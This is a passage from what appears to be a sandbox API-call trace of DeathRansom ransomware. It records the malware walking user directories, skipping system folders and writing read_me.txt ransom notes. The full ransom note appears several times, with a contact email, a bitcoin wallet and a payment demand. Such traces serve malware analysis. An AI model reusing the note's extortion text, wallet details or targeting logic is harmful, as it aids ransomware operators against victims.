HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\CkixSmIJpPRf0.odp") returned 103 [0075.326] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae36390, ftCreationTime.dwHighDateTime=0x1d4cd9e, ftLastAccessTime.dwLowDateTime=0xa5ccaf30, ftLastAccessTime.dwHighDateTime=0x1d4d43f, ftLastWriteTime.dwLowDateTime=0xa5ccaf30, ftLastWriteTime.dwHighDateTime=0x1d4d43f, nFileSizeHigh=0x0, nFileSizeLow=0x3c04, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dp PC3.docx", cAlternateFileName="DPPC3~1.DOC")) returned 1 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\dp PC3.docx") returned 97 [0075.326] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982a6d70, ftCreationTime.dwHighDateTime=0x1d4cb95, ftLastAccessTime.dwLowDateTime=0x632bf6a0, ftLastAccessTime.dwHighDateTime=0x1d4c971, ftLastWriteTime.dwLowDateTime=0x632bf6a0, ftLastWriteTime.dwHighDateTime=0x1d4c971, nFileSizeHigh=0x0, nFileSizeLow=0x178cb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="FHeC3PnEp1b9.odt", cAlternateFileName="FHEC3P~1.ODT")) returned 1 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\FHeC3PnEp1b9.odt") returned 102 [0075.326] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a478a0, ftCreationTime.dwHighDateTime=0x1d4d503, ftLastAccessTime.dwLowDateTime=0xf6e0a580, ftLastAccessTime.dwHighDateTime=0x1d4cdd6, ftLastWriteTime.dwLowDateTime=0xf6e0a580, ftLastWriteTime.dwHighDateTime=0x1d4cdd6, nFileSizeHigh=0x0, nFileSizeLow=0x155fe, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="J3VBujVyzaSO.rtf", cAlternateFileName="J3VBUJ~1.RTF")) returned 1 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\J3VBujVyzaSO.rtf") returned 102 [0075.326] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8edaa140, ftCreationTime.dwHighDateTime=0x1d4cc80, ftLastAccessTime.dwLowDateTime=0x6e1ce960, ftLastAccessTime.dwHighDateTime=0x1d4d3ef, ftLastWriteTime.dwLowDateTime=0x6e1ce960, ftLastWriteTime.dwHighDateTime=0x1d4d3ef, nFileSizeHigh=0x0, nFileSizeLow=0x1059, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_zNOJv_bA_jWdzqFVz.ots", cAlternateFileName="_ZNOJV~1.OTS")) returned 1 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\_zNOJv_bA_jWdzqFVz.ots") returned 108 [0075.326] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8edaa140, ftCreationTime.dwHighDateTime=0x1d4cc80, ftLastAccessTime.dwLowDateTime=0x6e1ce960, ftLastAccessTime.dwHighDateTime=0x1d4d3ef, ftLastWriteTime.dwLowDateTime=0x6e1ce960, ftLastWriteTime.dwHighDateTime=0x1d4d3ef, nFileSizeHigh=0x0, nFileSizeLow=0x1059, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_zNOJv_bA_jWdzqFVz.ots", cAlternateFileName="_ZNOJV~1.OTS")) returned 0 [0075.326] FindClose (in: hFindFile=0x7cfea28 | out: hFindFile=0x7cfea28) returned 1 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\read_me.txt") returned 97 [0075.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\d n1nxfm_av6ay4cwc\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.327] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.327] WriteFile (in: hFile=0x7a4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d57c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d57c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.328] CloseHandle (hObject=0x7a4) returned 1 [0075.328] GetProcessHeap () returned 0x4f10000 [0075.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20118 | out: hHeap=0x4f10000) returned 1 [0075.328] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79cddf60, ftCreationTime.dwHighDateTime=0x1d4ced8, ftLastAccessTime.dwLowDateTime=0xd7f6f7b0, ftLastAccessTime.dwHighDateTime=0x1d4cdad, ftLastWriteTime.dwLowDateTime=0xd7f6f7b0, ftLastWriteTime.dwHighDateTime=0x1d4cdad, nFileSizeHigh=0x0, nFileSizeLow=0x8fbd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dg4oVF.pptx", cAlternateFileName="DG4OVF~1.PPT")) returned 1 [0075.328] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\dg4oVF.pptx") returned 78 [0075.328] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3099240, ftCreationTime.dwHighDateTime=0x1d4d368, ftLastAccessTime.dwLowDateTime=0x271368d0, ftLastAccessTime.dwHighDateTime=0x1d4d00e, ftLastWriteTime.dwLowDateTime=0x271368d0, ftLastWriteTime.dwHighDateTime=0x1d4d00e, nFileSizeHigh=0x0, nFileSizeLow=0xa09e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_rKnr.rtf", cAlternateFileName="")) returned 1 [0075.328] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\_rKnr.rtf") returned 76 [0075.328] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3099240, ftCreationTime.dwHighDateTime=0x1d4d368, ftLastAccessTime.dwLowDateTime=0x271368d0, ftLastAccessTime.dwHighDateTime=0x1d4d00e, ftLastWriteTime.dwLowDateTime=0x271368d0, ftLastWriteTime.dwHighDateTime=0x1d4d00e, nFileSizeHigh=0x0, nFileSizeLow=0xa09e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_rKnr.rtf", cAlternateFileName="")) returned 0 [0075.328] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.328] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\read_me.txt") returned 78 [0075.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.393] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.393] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.394] CloseHandle (hObject=0x7b8) returned 1 [0075.394] GetProcessHeap () returned 0x4f10000 [0075.394] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c00108 | out: hHeap=0x4f10000) returned 1 [0075.394] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e5db7d0, ftCreationTime.dwHighDateTime=0x1d4d099, ftLastAccessTime.dwLowDateTime=0xe7309f10, ftLastAccessTime.dwHighDateTime=0x1d4d235, ftLastWriteTime.dwLowDateTime=0xe7309f10, ftLastWriteTime.dwHighDateTime=0x1d4d235, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PwtM6T", cAlternateFileName="")) returned 1 [0075.394] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T") returned 67 [0075.395] lstrcmpW (lpString1="PwtM6T", lpString2="..") returned 1 [0075.395] lstrcmpW (lpString1="PwtM6T", lpString2=".") returned 1 [0075.395] StrStrW (lpFirst="pwtm6t", lpSrch="programdata") returned 0x0 [0075.395] StrStrW (lpFirst="pwtm6t", lpSrch="$recycle.bin") returned 0x0 [0075.395] StrStrW (lpFirst="pwtm6t", lpSrch="program files") returned 0x0 [0075.395] StrStrW (lpFirst="pwtm6t", lpSrch="windows") returned 0x0 [0075.395] StrStrW (lpFirst="pwtm6t", lpSrch="all users") returned 0x0 [0075.395] StrStrW (lpFirst="pwtm6t", lpSrch="appdata") returned 0x0 [0075.395] GetProcessHeap () returned 0x4f10000 [0075.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c00108 [0075.395] lstrcpyW (in: lpString1=0x8c00108, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T" [0075.395] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 53 [0075.395] QueueUserWorkItem (Function=0x40a710, Context=0x8c00108, Flags=0x0) returned 1 [0075.395] GetProcessHeap () returned 0x4f10000 [0075.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20118 [0075.395] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\*") returned 69 [0075.395] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e5db7d0, ftCreationTime.dwHighDateTime=0x1d4d099, ftLastAccessTime.dwLowDateTime=0xe7309f10, ftLastAccessTime.dwHighDateTime=0x1d4d235, ftLastWriteTime.dwLowDateTime=0xe7309f10, ftLastWriteTime.dwHighDateTime=0x1d4d235, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.395] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\.") returned 69 [0075.395] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.395] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.395] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e5db7d0, ftCreationTime.dwHighDateTime=0x1d4d099, ftLastAccessTime.dwLowDateTime=0xe7309f10, ftLastAccessTime.dwHighDateTime=0x1d4d235, ftLastWriteTime.dwLowDateTime=0xe7309f10, ftLastWriteTime.dwHighDateTime=0x1d4d235, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.396] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\..") returned 70 [0075.396] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.396] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e5db7d0, ftCreationTime.dwHighDateTime=0x1d4d099, ftLastAccessTime.dwLowDateTime=0xe7309f10, ftLastAccessTime.dwHighDateTime=0x1d4d235, ftLastWriteTime.dwLowDateTime=0xe7309f10, ftLastWriteTime.dwHighDateTime=0x1d4d235, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 0 [0075.396] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.396] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\read_me.txt") returned 79 [0075.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\pwtm6t\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.396] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.396] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.397] CloseHandle (hObject=0x7b8) returned 1 [0075.397] GetProcessHeap () returned 0x4f10000 [0075.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20118 | out: hHeap=0x4f10000) returned 1 [0075.397] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe9b37f0, ftCreationTime.dwHighDateTime=0x1d4cb2c, ftLastAccessTime.dwLowDateTime=0xe4bc2ec0, ftLastAccessTime.dwHighDateTime=0x1d4cd76, ftLastWriteTime.dwLowDateTime=0xe4bc2ec0, ftLastWriteTime.dwHighDateTime=0x1d4cd76, nFileSizeHigh=0x0, nFileSizeLow=0x2acf, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qlydpxKQGSEMlw.csv", cAlternateFileName="QLYDPX~1.CSV")) returned 1 [0075.397] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\qlydpxKQGSEMlw.csv") returned 79 [0075.397] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169f30f0, ftCreationTime.dwHighDateTime=0x1d4cd7b, ftLastAccessTime.dwLowDateTime=0x397770, ftLastAccessTime.dwHighDateTime=0x1d4ce62, ftLastWriteTime.dwLowDateTime=0x397770, ftLastWriteTime.dwHighDateTime=0x1d4ce62, nFileSizeHigh=0x0, nFileSizeLow=0x157a9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tBy7vnJ20L.odt", cAlternateFileName="TBY7VN~1.ODT")) returned 1 [0075.397] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\tBy7vnJ20L.odt") returned 75 [0075.397] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc3a430, ftCreationTime.dwHighDateTime=0x1d4cd45, ftLastAccessTime.dwLowDateTime=0xc2aa53e0, ftLastAccessTime.dwHighDateTime=0x1d4d3b9, ftLastWriteTime.dwLowDateTime=0xc2aa53e0, ftLastWriteTime.dwHighDateTime=0x1d4d3b9, nFileSizeHigh=0x0, nFileSizeLow=0x129fa, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_DYrqU5.xls", cAlternateFileName="")) returned 1 [0075.397] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\_DYrqU5.xls") returned 72 [0075.397] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc3a430, ftCreationTime.dwHighDateTime=0x1d4cd45, ftLastAccessTime.dwLowDateTime=0xc2aa53e0, ftLastAccessTime.dwHighDateTime=0x1d4d3b9, ftLastWriteTime.dwLowDateTime=0xc2aa53e0, ftLastWriteTime.dwHighDateTime=0x1d4d3b9, nFileSizeHigh=0x0, nFileSizeLow=0x129fa, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_DYrqU5.xls", cAlternateFileName="")) returned 0 [0075.397] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.397] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\read_me.txt") returned 72 [0075.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.398] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 